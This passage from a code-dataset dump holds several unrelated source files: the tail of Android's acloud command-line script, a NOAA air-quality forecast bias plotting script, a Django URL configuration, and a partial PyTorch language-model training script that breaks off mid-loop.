--instance_names instance-1 instance-2\")\n subparser_list.append(delete_parser)\n\n # Command \"cleanup\"\n cleanup_parser = subparsers.add_parser(CMD_CLEANUP)\n cleanup_parser.required = False\n cleanup_parser.set_defaults(which=CMD_CLEANUP)\n cleanup_parser.add_argument(\n \"--expiration_mins\",\n type=int,\n dest=\"expiration_mins\",\n required=True,\n help=\"Garbage collect all gce instances, gce images, cached disk \"\n \"images that are older than |expiration_mins|.\")\n subparser_list.append(cleanup_parser)\n\n # Command \"project_sshkey\"\n sshkey_parser = subparsers.add_parser(CMD_SSHKEY)\n sshkey_parser.required = False\n sshkey_parser.set_defaults(which=CMD_SSHKEY)\n sshkey_parser.add_argument(\n \"--user\",\n type=str,\n dest=\"user\",\n default=getpass.getuser(),\n help=\"The user name which the sshkey belongs to, default to: %s.\" %\n getpass.getuser())\n sshkey_parser.add_argument(\n \"--ssh_rsa_path\",\n type=str,\n dest=\"ssh_rsa_path\",\n required=True,\n help=\"Absolute path to the file that contains the public rsa key \"\n \"that will be added as project-wide ssh key.\")\n subparser_list.append(sshkey_parser)\n\n # Add common arguments.\n for p in subparser_list:\n acloud_common.AddCommonArguments(p)\n\n return parser.parse_args(args)\n\n\ndef _TranslateAlias(parsed_args):\n \"\"\"Translate alias to Launch Control compatible values.\n\n This method translates alias to Launch Control compatible values.\n - branch: \"git_\" prefix will be added if branch name doesn't have it.\n - build_target: For example, \"phone\" will be translated to full target\n name \"git_x86_phone-userdebug\",\n\n Args:\n parsed_args: Parsed args.\n\n Returns:\n Parsed args with its values being translated.\n \"\"\"\n if parsed_args.which == CMD_CREATE:\n if (parsed_args.branch and\n not parsed_args.branch.startswith(constants.BRANCH_PREFIX)):\n parsed_args.branch = constants.BRANCH_PREFIX + parsed_args.branch\n parsed_args.build_target = constants.BUILD_TARGET_MAPPING.get(\n parsed_args.build_target, parsed_args.build_target)\n return parsed_args\n\n\ndef _VerifyArgs(parsed_args):\n \"\"\"Verify args.\n\n Args:\n parsed_args: Parsed args.\n\n Raises:\n errors.CommandArgError: If args are invalid.\n \"\"\"\n if parsed_args.which == CMD_CREATE:\n if (parsed_args.spec and parsed_args.spec not in constants.SPEC_NAMES):\n raise errors.CommandArgError(\n \"%s is not valid. 
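# Illustrative round-trip of the alias translation above: a branch gains the
# prefix only when it is missing. "git_" is an assumed value for
# constants.BRANCH_PREFIX, used here only to make the sketch self-contained.
BRANCH_PREFIX = "git_"

def translate_branch(branch):
    if branch and not branch.startswith(BRANCH_PREFIX):
        branch = BRANCH_PREFIX + branch
    return branch

assert translate_branch("mnc-dev") == "git_mnc-dev"
assert translate_branch("git_mnc-dev") == "git_mnc-dev"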
Choose from: %s\" %\n (parsed_args.spec, \", \".join(constants.SPEC_NAMES)))\n if not ((parsed_args.build_id and parsed_args.build_target) or\n parsed_args.gce_image or parsed_args.local_disk_image):\n raise errors.CommandArgError(\n \"At least one of the following should be specified: \"\n \"--build_id and --build_target, or --gce_image, or \"\n \"--local_disk_image.\")\n if bool(parsed_args.build_id) != bool(parsed_args.build_target):\n raise errors.CommandArgError(\n \"Must specify --build_id and --build_target at the same time.\")\n if (parsed_args.serial_log_file and\n not parsed_args.serial_log_file.endswith(\".tar.gz\")):\n raise errors.CommandArgError(\n \"--serial_log_file must ends with .tar.gz\")\n if (parsed_args.logcat_file and\n not parsed_args.logcat_file.endswith(\".tar.gz\")):\n raise errors.CommandArgError(\n \"--logcat_file must ends with .tar.gz\")\n\n\ndef _SetupLogging(log_file, verbose, very_verbose):\n \"\"\"Setup logging.\n\n Args:\n log_file: path to log file.\n verbose: If True, log at DEBUG level, otherwise log at INFO level.\n very_verbose: If True, log at DEBUG level and turn on logging on\n all libraries. Take take precedence over |verbose|.\n \"\"\"\n if very_verbose:\n logger = logging.getLogger()\n else:\n logger = logging.getLogger(LOGGER_NAME)\n\n logging_level = logging.DEBUG if verbose or very_verbose else logging.INFO\n logger.setLevel(logging_level)\n\n if not log_file:\n handler = logging.StreamHandler()\n else:\n handler = logging.FileHandler(filename=log_file)\n log_formatter = logging.Formatter(LOGGING_FMT)\n handler.setFormatter(log_formatter)\n logger.addHandler(handler)\n\n\ndef main(argv):\n \"\"\"Main entry.\n\n Args:\n argv: A list of system arguments.\n\n Returns:\n 0 if success. None-zero if fails.\n \"\"\"\n args = _ParseArgs(argv)\n _SetupLogging(args.log_file, args.verbose, args.very_verbose)\n args = _TranslateAlias(args)\n _VerifyArgs(args)\n\n config_mgr = config.AcloudConfigManager(args.config_file)\n cfg = config_mgr.Load()\n cfg.OverrideWithArgs(args)\n\n # Check access.\n device_driver.CheckAccess(cfg)\n\n if args.which == CMD_CREATE:\n report = device_driver.CreateAndroidVirtualDevices(\n cfg,\n args.build_target,\n args.build_id,\n args.num,\n args.gce_image,\n args.local_disk_image,\n cleanup=not args.no_cleanup,\n serial_log_file=args.serial_log_file,\n logcat_file=args.logcat_file)\n elif args.which == CMD_DELETE:\n report = device_driver.DeleteAndroidVirtualDevices(cfg,\n args.instance_names)\n elif args.which == CMD_CLEANUP:\n report = device_driver.Cleanup(cfg, args.expiration_mins)\n elif args.which == CMD_SSHKEY:\n report = device_driver.AddSshRsa(cfg, args.user, args.ssh_rsa_path)\n else:\n sys.stderr.write(\"Invalid command %s\" % args.which)\n return 2\n\n report.Dump(args.report_file)\n if report.errors:\n msg = \"\\n\".join(report.errors)\n sys.stderr.write(\"Encountered the following errors:\\n%s\\n\" % msg)\n return 1\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"tools/acloud/public/acloud_main.py","file_name":"acloud_main.py","file_ext":"py","file_size_in_byte":12301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"361123172","text":"#!/usr/bin/env python\n\n###############################################################\n# < next few lines under version control, D O N O T E D I T >\n# $Date: 2018-03-29 10:12:00 -0400 (Thu, 29 Mar 2018) $\n# $Revision: 100014 $\n# $Author: Barry.Baker@noaa.gov $\n# $Id: nemsio2nc4.py 
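# Condensed sketch of the handler wiring in _SetupLogging above: verbose raises
# the named logger to DEBUG, while very_verbose targets the root logger so
# third-party libraries log as well. Format string copied from the module.
import logging

logger = logging.getLogger("acloud_main")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(
    "%(asctime)s |%(levelname)s| %(module)s:%(lineno)s| %(message)s"))
logger.addHandler(handler)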
100014 2018-03-29 14:12:00Z Barry.Baker@noaa.gov $\n###############################################################\n\n__author__ = 'Patrick.C.Campbell'\n__email__ = 'Patrick.C.Campbell@noaa.gov'\n__license__ = 'GPL'\n\nimport os\nimport subprocess\nimport sys\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nimport cartopy.crs as ccrs\nimport dask\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport monet\nfrom monet.util.tools import calc_8hr_rolling_max,calc_24hr_ave,get_relhum\nimport dask.dataframe as dd\n\nsns.set_context('notebook')\n\nplt.ioff()\n'''\nSimple utility to make spatial plots from the NAQFC forecast and overlay observations\n'''\n\ninitial_datetime = None\n\ndef make_24hr_regulatory(df,col=None):\n \"\"\" Make 24-hour averages \"\"\"\n return calc_24hr_ave(df,col)\n\ndef make_8hr_regulatory(df,col=None):\n \"\"\" Make 8-hour rolling average daily \"\"\"\n return calc_8hr_rolling_max(df,col,window=8)\n\n\ndef chdir(fname):\n dir_path = os.path.dirname(os.path.realpath(fname))\n os.chdir(dir_path)\n return os.path.basename(fname)\n\ndef load_paired_data(fname):\n return dd.read_hdf(fname,'/*').compute()\n\n\ndef make_spatial_bias_plot(df,\n out_name,\n vmin,\n vmax,\n col1='aod_550nm',\n col2='pm25aod550',\n date=None,\n region='domain',\n **kwargs):\n if region == 'domain':\n ax = monet.plots.sp_scatter_bias(\n df, col1=col1, col2=col2, map_kwargs=dict(states=False),val_max=vmax,val_min=vmin,**kwargs)\n else:\n ax = monet.plots.sp_scatter_bias(\n df, col1=col1, col2=col2, map_kwargs=dict(states=True),val_max=vmax,val_min=vmin,**kwargs)\n\n date = pd.Timestamp(date)\n dt = date - initial_datetime\n dtstr = str(dt.days * 24 + dt.seconds // 3600).zfill(3)\n plt.title(date.strftime('time=%Y/%m/%d %H:00 | CMAQ - AIRNOW '))\n \n if region == 'domain':\n latmin=-90.0\n lonmin=-180.0\n latmax=90.0\n lonmax=180.0\n else:\n from monet.util.tools import get_giorgi_region_bounds as get_giorgi_bounds \n latmin,lonmin,latmax,lonmax,acro = get_giorgi_bounds(index=None,acronym=region)\n \n plt.xlim([lonmin,lonmax])\n plt.ylim([latmin,latmax]) \n \n plt.tight_layout(pad=0)\n savename = \"{}.{}.{}.jpg\".format(out_name,\n initial_datetime.strftime('spbias'),\n dtstr)\n print(savename)\n monet.plots.savefig(savename, bbox_inches='tight', dpi=100, decorate=True)\n plt.close()\n\n\ndef make_plots(df, variable, obs_variable, startdate, enddate, region,vmin,vmax,out_name):\n if startdate == None and enddate == None:\n for t in df.time.unique():\n date = pd.Timestamp(t)\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n print('Creating Plot:', obs_variable, 'at time:', date)\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n odf = df.loc[df.time ==\n date, ['time', 'latitude', 'longitude', obs_variable, variable]]\n if ~odf.empty:\n make_spatial_bias_plot(\n odf,\n out_name,\n vmin,\n vmax,\n col1=obs_variable,\n col2=variable,\n date=t,\n region=region,\n cmap='RdBu_r',\n edgecolor='k',\n linewidth=.8)\n else:\n sdate=pd.Timestamp(startdate)\n edate=pd.Timestamp(enddate)\n df_mean=df.groupby(['siteid'],as_index=False).mean()\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n print('Creating Plot:', obs_variable, 'for period:', startdate, 'to ', enddate )\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n make_spatial_bias_plot(\n df_mean,\n out_name,\n vmin,\n vmax,\n col1=obs_variable,\n 
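# Hedged pandas sketch approximating the 8-hour rolling maximum that
# make_8hr_regulatory above delegates to monet's calc_8hr_rolling_max; monet's
# exact grouping and completeness rules are assumed, not verified.
import pandas as pd

df = pd.DataFrame({"time": pd.date_range("2019-08-01", periods=24, freq="H"),
                   "OZONE": range(24)})
df["OZONE_8hr"] = df["OZONE"].rolling(window=8, min_periods=6).max()
print(df["OZONE_8hr"].max())  # daily maximum of the 8-hour rolling values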
col2=variable,\n date=edate,\n region=region,\n cmap='RdBu_r',\n edgecolor='k',\n linewidth=.8)\n\ndef get_df_region(obj, region):\n from monet.util.tools import get_giorgi_region_df as get_giorgi\n if region.lower() == 'domain':\n obj['GIORGI_ACRO'] = 'domain'\n return obj\n else:\n obj = get_giorgi(region)\n return obj.loc[obj.GIORGI_ACRO == region.upper()]\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser(\n description='Make Spatial Plots for each time step or over period in files',\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '-p',\n '--paired_data',\n help='paired data input file names',\n type=str,\n nargs='+',\n required=True)\n parser.add_argument(\n '-s', '--species', nargs='+', help='Species', required=False, default=['aod_550nm'])\n parser.add_argument(\n '-b',\n '--subset_giorgi',\n help='Giorgi Region Subset true/false',\n type=bool,\n required=False,\n default=False)\n parser.add_argument(\n '-g',\n '--giorgi_region',\n help='GIORGI Region ACRONYMs NAU,SAU,AMZ,SSA,CAM,WNA,CNA,ENA,ALA,GRL,MED,NEU,WAF,EAF,SAF,SAH,SEA,EAS,SAS,CAS,TIB,NAS',\n required=False,\n default='domain')\n parser.add_argument(\n '-n',\n '--output_name',\n help='Spatial bias plot Output base name',\n type=str,\n required=False,\n default='AERONET_FV3CHEM')\n parser.add_argument(\n '-r',\n '--regulatory',\n help='boolean set to True fore 8-hrmax or 24-ave NAAQS regulatory calcs',\n type=bool,\n required=False,\n default=False)\n parser.add_argument(\n '-sd',\n '--startdate',\n help='Startdate for bias plot statistics over a period YYYY-MM-DD HH:MM:SS',\n type=str,\n required=False,\n default=None)\n parser.add_argument(\n '-ed',\n '--enddate',\n help='Enddate for bias plot statisics over a period YYYY-MM-DD HH:MM:SS',\n type=str,\n required=False,\n default=None)\n parser.add_argument(\n '-miny', '--miny_scale', help='Set static min y-scale', type=float, required=False, default=None)\n parser.add_argument(\n '-maxy', '--maxy_scale', help='Set static max y-scale', type=float, required=False, default=None)\n args = parser.parse_args()\n\n paired_data = args.paired_data\n species = args.species\n out_name = args.output_name\n subset = args.subset_giorgi\n region = args.giorgi_region\n startdate = args.startdate\n enddate = args.enddate\n reg = args.regulatory\n vmin = args.miny_scale\n vmax = args.maxy_scale\n\n\n#load the paired dataframe \n df = load_paired_data(paired_data)\n mapping_table = {'aod_550nm':'pm25aod550'}\n sub_map = {i: mapping_table[i] for i in species if i in mapping_table}\n if region is \"domain\":\n subset = False \n# subset only the correct region\n #if subset is True:\n # df.query('giorgi_region == '+'\"'+region+'\"',inplace=True)\n\n #Loop through species\n for jj in species:\n df[jj] = np.where(df[jj]<=0, np.nan, df[jj]) #Replace all values < 0 with NaN\n df_drop=df.dropna(subset=[jj,sub_map.get(jj)]) #Drops all corresponding rows with obs species = NaN\n\n#Converts OZONE, PM10, or PM2.5 dataframe to NAAQS regulatory values\n if jj == 'OZONE' and reg is True:\n df2 = make_8hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n elif jj == 'aod_550nm' and reg is True:\n df2 = make_24hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n elif jj == 'pm10_ugm3' and reg is True:\n df2 = make_24hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n 
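# Minimal sketch of the pairing cleanup pattern used in the species loop above:
# non-positive observations become NaN, then rows missing either member of the
# obs/model pair are dropped. Column names are placeholders.
import numpy as np
import pandas as pd

df = pd.DataFrame({"obs": [5.0, -1.0, 7.0], "model": [4.0, 2.0, np.nan]})
df["obs"] = np.where(df["obs"] <= 0, np.nan, df["obs"])
paired = df.dropna(subset=["obs", "model"])  # only fully paired rows remain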
else:\n df2=df_drop\n#Convert airnow met variable if necessary:\n if jj == 'WS':\n df2.loc[:,'WS']=df2.loc[:,'WS']*0.514 #convert obs knots-->m/s\n df2.query('WS > 0.2',inplace=True) #Filter out calm WS obs (< 0.2 m/s), should not be trusted--creates artificially larger postive model bias\n elif jj == 'BARPR':\n df2.loc[:,'PRSFC']=df2.loc[:,'PRSFC']*0.01 #convert model Pascals-->millibars\n elif jj == 'PRECIP':\n df2.loc[:,'PRECIP']=df2.loc[:,'PRECIP']*0.1 #convert obs mm-->cm\n elif jj == 'TEMP':\n df2.loc[:,'TEMP2'] = df2.loc[:,'TEMP2']-273.16 #convert model K-->C\n elif jj == 'RHUM':\n #convert model mixing ratio to relative humidity\n df2.loc[:,'Q2'] = get_relhum(df2.loc[:,'TEMP2'],df2.loc[:,'PRSFC'],df2.loc[:,'Q2'])\n #df2.rename(index=str,columns={\"Q2\": \"RH_mod\"},inplace=True)\n elif jj == 'CO':\n df2.loc[:,'CO']=df2.loc[:,'CO']*1000.0 #convert obs ppm-->ppb\n else:\n df2=df2\n#subset for period, or use output frequency\n if startdate != None and enddate != None:\n mask = (df2['time'] >= startdate) & (df2['time'] <= enddate)\n dfnew =df2.loc[mask]\n import datetime\n startdatename_obj = datetime.datetime.strptime(startdate, '%Y-%m-%d %H:%M:%S')\n enddatename_obj = datetime.datetime.strptime(enddate, '%Y-%m-%d %H:%M:%S')\n startdatename = str(datetime.datetime.strftime(startdatename_obj,'%Y-%m-%d_%H'))\n enddatename = str(datetime.datetime.strftime(enddatename_obj,'%Y-%m-%d_%H'))\n outname = \"{}.{}.{}.{}.{}\".format(out_name, region, jj, startdatename, enddatename)\n if reg is True:\n outname = \"{}.{}.{}.{}.{}.{}\".format(out_name,region, jj,startdatename, enddatename,'reg')\n if jj == 'PM2.5':\n outname = outname.replace('PM2.5','PM2P5')\n if region == 'domain':\n outname = outname.replace('domain','5X')\n else:\n dfnew = df2\n outname = \"{}.{}.{}\".format(out_name, region, jj)\n if reg is True:\n outname = \"{}.{}.{}.{}\".format(out_name,region, jj, 'reg')\n if jj == 'PM2.5':\n outname = outname.replace('PM2.5','PM2P5')\n if region == 'domain':\n outname = outname.replace('domain', '5X')\n\n dfnew_drop=dfnew.dropna(subset=[jj,sub_map.get(jj)])\n\n initial_datetime = dfnew_drop.time.min()\n # make the plots\n make_plots(dfnew_drop, sub_map.get(jj), jj, startdate, enddate, region,vmin,vmax,outname)\n","sub_path":"04.verify_spatial_bias_aeronet.py","file_name":"04.verify_spatial_bias_aeronet.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"336122645","text":"from django.conf.urls import url\nfrom designsafe.apps.data.views.base import DataDepotView\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nurlpatterns = [\n url(r'^browser/', DataDepotView.as_view(template_name='data/data_depot.html'),\n name='data_depot')\n\n]\n\ndef menu_items(**kwargs):\n if 'type' in kwargs and kwargs['type'] == 'research_workbench':\n return [\n {\n 'label': _('Published Data'),\n 'url': reverse('designsafe_data:public_data'),\n 'children': []\n },\n {\n 'label': _('My Data'),\n 'url': reverse('designsafe_data:my_data'),\n 'children': []\n }\n ]\n","sub_path":"designsafe/apps/data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"439043351","text":"\nimport argparse\nfrom utils.data import Data\nimport random\nimport torch\nimport numpy as np\nimport sys\nimport gc\n\nseed_num = 
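# Sketch of the timestamp round-trip used above to build output file names;
# the format strings are copied from the script, the dates are illustrative.
import datetime

start = datetime.datetime.strptime("2019-08-01 12:00:00", "%Y-%m-%d %H:%M:%S")
print(start.strftime("%Y-%m-%d_%H"))  # -> 2019-08-01_12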
42\nrandom.seed(seed_num)\ntorch.manual_seed(seed_num)\nnp.random.seed(seed_num)\n\ndef data_initialization(data):\n data.initial_feature_alphabets()\n data.build_alphabet(data.s_lm, ner_data=False)\n data.build_alphabet(data.t_lm, ner_data=False)\n data.build_alphabet(data.s_ner_train)\n data.build_alphabet(data.s_ner_eval)\n data.build_alphabet(data.train_dir)\n data.build_alphabet(data.dev_dir)\n data.build_alphabet(data.test_dir)\n data.fix_alphabet()\n\ndef predict_check(pred_variable, gold_variable, mask_variable, sentence_classification=False):\n \"\"\"\n input:\n pred_variable (batch_size, sent_len): pred tag result, in numpy format\n gold_variable (batch_size, sent_len): gold result variable\n mask_variable (batch_size, sent_len): mask variable\n \"\"\"\n pred = pred_variable.cpu().data.numpy()\n gold = gold_variable.cpu().data.numpy()\n mask = mask_variable.cpu().data.numpy()\n overlaped = (pred == gold)\n if sentence_classification:\n # print(overlaped)\n # print(overlaped*pred)\n right_token = np.sum(overlaped)\n total_token = overlaped.shape[0] ## =batch_size\n else:\n right_token = np.sum(overlaped * mask)\n total_token = mask.sum()\n # print(\"right: %s, total: %s\"%(right_token, total_token))\n return right_token, total_token\n\ndef batchify_with_label(input_batch_list, input_text_batch_list, gpu, if_train=True, sentence_classification=False):\n if sentence_classification:\n # return batchify_sentence_classification_with_label(input_batch_list, gpu, if_train)\n raise RuntimeError(\"not support\")\n else:\n return batchify_sequence_labeling_with_label(input_batch_list, input_text_batch_list, gpu, if_train)\n\nfrom elmo.elmo import batch_to_ids\n\ndef batchify_sequence_labeling_with_label(input_batch_list, input_text_batch_list, gpu, if_train=True):\n\n batch_size = len(input_batch_list)\n words = [sent[0] for sent in input_batch_list]\n features = [np.asarray(sent[1]) for sent in input_batch_list]\n feature_num = len(features[0][0])\n chars = [sent[2] for sent in input_batch_list]\n labels_forward = [sent[3] for sent in input_batch_list]\n labels_backward = [sent[4] for sent in input_batch_list]\n\n words_text = [sent[5] for sent in input_text_batch_list]\n elmo_char_seq_tensor = batch_to_ids(words_text)\n\n word_seq_lengths = torch.LongTensor(list(map(len, words)))\n max_seq_len = word_seq_lengths.max().item()\n word_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).long()\n label_forward_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).long()\n label_backward_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad= if_train).long()\n feature_seq_tensors = []\n for idx in range(feature_num):\n feature_seq_tensors.append(torch.zeros((batch_size, max_seq_len),requires_grad = if_train).long())\n mask = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).byte()\n for idx, (seq, label_forward, label_backward, seqlen) in enumerate(zip(words, labels_forward, labels_backward, word_seq_lengths)):\n seqlen = seqlen.item()\n word_seq_tensor[idx, :seqlen] = torch.LongTensor(seq)\n label_forward_seq_tensor[idx, :seqlen] = torch.LongTensor(label_forward)\n label_backward_seq_tensor[idx, :seqlen] = torch.LongTensor(label_backward)\n mask[idx, :seqlen] = torch.Tensor([1]*seqlen)\n for idy in range(feature_num):\n feature_seq_tensors[idy][idx,:seqlen] = torch.LongTensor(features[idx][:,idy])\n word_seq_lengths, word_perm_idx = word_seq_lengths.sort(0, descending=True)\n word_seq_tensor = 
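# Sketch of the sort-by-length / recover-permutation idiom used in the
# batchify code above: batches are ordered by descending length (the layout
# packed-RNN utilities such as torch.nn.utils.rnn.pack_padded_sequence
# expect), and the inverse permutation is kept to restore the original order.
import torch

lengths = torch.LongTensor([3, 5, 2])
lengths, perm = lengths.sort(0, descending=True)
_, recover = perm.sort(0, descending=False)
print(lengths, perm[recover])  # perm[recover] is the identity order 0,1,2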
word_seq_tensor[word_perm_idx]\n for idx in range(feature_num):\n feature_seq_tensors[idx] = feature_seq_tensors[idx][word_perm_idx]\n\n label_forward_seq_tensor = label_forward_seq_tensor[word_perm_idx]\n label_backward_seq_tensor = label_backward_seq_tensor[word_perm_idx]\n mask = mask[word_perm_idx]\n elmo_char_seq_tensor = elmo_char_seq_tensor[word_perm_idx]\n ### deal with char\n # pad_chars (batch_size, max_seq_len)\n pad_chars = [chars[idx] + [[0]] * (max_seq_len-len(chars[idx])) for idx in range(len(chars))]\n length_list = [list(map(len, pad_char)) for pad_char in pad_chars]\n max_word_len = max(map(max, length_list))\n char_seq_tensor = torch.zeros((batch_size, max_seq_len, max_word_len), requires_grad = if_train).long()\n char_seq_lengths = torch.LongTensor(length_list)\n for idx, (seq, seqlen) in enumerate(zip(pad_chars, char_seq_lengths)):\n for idy, (word, wordlen) in enumerate(zip(seq, seqlen)):\n # print len(word), wordlen\n char_seq_tensor[idx, idy, :wordlen] = torch.LongTensor(word)\n\n char_seq_tensor = char_seq_tensor[word_perm_idx].view(batch_size*max_seq_len,-1)\n char_seq_lengths = char_seq_lengths[word_perm_idx].view(batch_size*max_seq_len,)\n char_seq_lengths, char_perm_idx = char_seq_lengths.sort(0, descending=True)\n char_seq_tensor = char_seq_tensor[char_perm_idx]\n _, char_seq_recover = char_perm_idx.sort(0, descending=False)\n _, word_seq_recover = word_perm_idx.sort(0, descending=False)\n if gpu >= 0 and torch.cuda.is_available():\n word_seq_tensor = word_seq_tensor.cuda(gpu)\n for idx in range(feature_num):\n feature_seq_tensors[idx] = feature_seq_tensors[idx].cuda(gpu)\n word_seq_lengths = word_seq_lengths.cuda(gpu)\n word_seq_recover = word_seq_recover.cuda(gpu)\n label_forward_seq_tensor = label_forward_seq_tensor.cuda(gpu)\n label_backward_seq_tensor = label_backward_seq_tensor.cuda(gpu)\n char_seq_tensor = char_seq_tensor.cuda(gpu)\n char_seq_recover = char_seq_recover.cuda(gpu)\n mask = mask.cuda(gpu)\n elmo_char_seq_tensor = elmo_char_seq_tensor.cuda(gpu)\n return word_seq_tensor,feature_seq_tensors, word_seq_lengths, word_seq_recover, char_seq_tensor, char_seq_lengths, char_seq_recover, label_forward_seq_tensor, label_backward_seq_tensor, mask, elmo_char_seq_tensor\n\nfrom model.lm1 import LanguageModel1\nimport torch.optim as optim\nimport time\n\ndef lr_decay(optimizer, epoch, decay_rate, init_lr):\n lr = init_lr/(1+decay_rate*epoch)\n print(\" Learning rate is set as:\", lr)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return optimizer\n\n\ndef train(data):\n print(\"Training model...\")\n data.show_data_summary()\n save_data_name = data.lm_model_dir +\".dset\"\n data.save(save_data_name)\n\n model = LanguageModel1(data)\n\n if data.optimizer.lower() == \"sgd\":\n optimizer = optim.SGD(model.parameters(), lr=data.HP_lr, momentum=data.HP_momentum,weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adagrad\":\n optimizer = optim.Adagrad(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adadelta\":\n optimizer = optim.Adadelta(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"rmsprop\":\n optimizer = optim.RMSprop(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adam\":\n optimizer = optim.Adam(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n else:\n print(\"Optimizer illegal: %s\"%(data.optimizer))\n exit(1)\n\n def freeze_net(model):\n for p in 
model.word_hidden.wordrep.word_embedding.parameters():\n p.requires_grad = False\n if data.tune_wordemb == False:\n freeze_net(model)\n\n train_on_domain(model, data.HP_iteration, data.optimizer, optimizer, data.HP_lr_decay, data.HP_lr, data.HP_batch_size,\n data.sentence_classification, data.HP_gpu, data.lm_model_dir, data.patience, data.lm_obj_acc,\n data.train_texts, data.train_Ids, target=False)\n\n train_on_domain(model, data.HP_iteration, data.optimizer, optimizer, data.HP_lr_decay, data.HP_lr, data.HP_batch_size,\n data.sentence_classification, data.HP_gpu, data.lm_model_dir, data.patience, data.lm_obj_acc,\n data.dev_texts, data.dev_Ids, target=True)\n\n\ndef train_on_domain(model, iteration, optim_name, optimizer, lr_decay, lr, batch_size, sent_class, gpu, lm_model_dir, patience,\n lm_obj_acc, texts, ids, target=True):\n best_dev = -10\n bad_counter = 0\n ## start training\n for idx in range(iteration):\n epoch_start = time.time()\n temp_start = epoch_start\n print(\"Epoch: %s/%s\" %(idx,iteration))\n if optim_name == \"SGD\":\n optimizer = lr_decay(optimizer, idx, lr_decay, lr)\n instance_count = 0\n sample_id = 0\n sample_loss = 0\n total_loss = 0\n right_token = 0\n whole_token = 0\n cc = list(zip(ids, texts))\n random.shuffle(cc)\n ids[:], texts[:] = zip(*cc)\n print(\"Shuffle: first input word list:\", ids[0][0])\n ## set model in train model\n model.train()\n model.zero_grad()\n train_num = len(ids)\n total_batch = train_num//batch_size+1\n for batch_id in range(total_batch):\n start = batch_id*batch_size\n end = (batch_id+1)*batch_size\n if end >train_num:\n end = train_num\n instance = ids[start:end]\n instance_text = texts[start:end]\n if not instance:\n continue\n batch_word, batch_features, batch_wordlen, batch_wordrecover, batch_char, batch_charlen, batch_charrecover, batch_label_forward, \\\n batch_label_backward, mask, batch_elmo_char = batchify_with_label(instance, instance_text,\n gpu, True, sent_class)\n instance_count += 1\n loss, tag_seq_forward, tag_seq_backward = model.calculate_loss(batch_word, batch_features, batch_wordlen, batch_char, batch_charlen, batch_charrecover, batch_label_forward, batch_label_backward, mask, batch_elmo_char, target)\n right_forward, whole_forward = predict_check(tag_seq_forward, batch_label_forward, mask, sent_class)\n right_backward, whole_backward = predict_check(tag_seq_backward, batch_label_backward, mask, sent_class)\n\n right_token += (right_forward + right_backward)\n whole_token += (whole_forward + whole_backward)\n # print(\"loss:\",loss.item())\n sample_loss += loss.item()\n total_loss += loss.item()\n if end%500 == 0:\n temp_time = time.time()\n temp_cost = temp_time - temp_start\n temp_start = temp_time\n print(\" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f\"%(end, temp_cost, sample_loss, right_token, whole_token,(right_token+0.)/whole_token))\n if sample_loss > 1e8 or str(sample_loss) == \"nan\":\n print(\"ERROR: LOSS EXPLOSION (>1e8) ! PLEASE SET PROPER PARAMETERS AND STRUCTURE! EXIT....\")\n exit(1)\n sys.stdout.flush()\n sample_loss = 0\n loss.backward()\n optimizer.step()\n model.zero_grad()\n temp_time = time.time()\n temp_cost = temp_time - temp_start\n print(\" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f\"%(end, temp_cost, sample_loss, right_token, whole_token,(right_token+0.)/whole_token))\n\n epoch_finish = time.time()\n epoch_cost = epoch_finish - epoch_start\n print(\"Epoch: %s training finished. 
